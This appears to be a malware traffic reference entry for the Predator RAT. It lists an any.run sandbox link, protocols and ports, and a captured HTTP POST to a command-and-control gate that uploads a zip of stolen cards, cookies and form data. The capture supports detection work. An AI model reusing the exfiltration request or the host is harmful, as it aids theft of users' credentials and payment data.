Predator RAT

Links:

https://app.any.run/tasks/48952db2-c7f6-4fe2-9d4e-75108916232a/

Protocols:

HTTP DNS

Ports:

80 53

Sample:

POST /api/gate.get?p1=1&p2=0&p3=0&p4=2&p5=0&p6=0&p7=0 HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------7
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
Host: hostss.mcdir.ru
Content-Length: 1170948
Connection: Keep-Alive
Cache-Control: no-cache

-----------------------------7
Content-Disposition: form-data; name="file"; filename="2U2T7U6U6V.zip"
Content-Type: application/octet-stream

PK........"b.N................General/UT
..=.+]=.+]=.+]PK........"Z.Nf..m
...........General/cards.txtUT
..-.+]-.+]-.+]SVp.(..M.....PK........"Z.N...G..../.......General/cookies.txtUT
..-.+]-.+]-.+]SV...../....RVp.(..M.3...l.PK........"Z.N..[.O...........General/forms.txtUT
..-.+]-.+]-.+]SVp.(..M....E.@....\....T+.......D.:.pYbN)P.=1.(35..n.D....S.2......
[email protected],.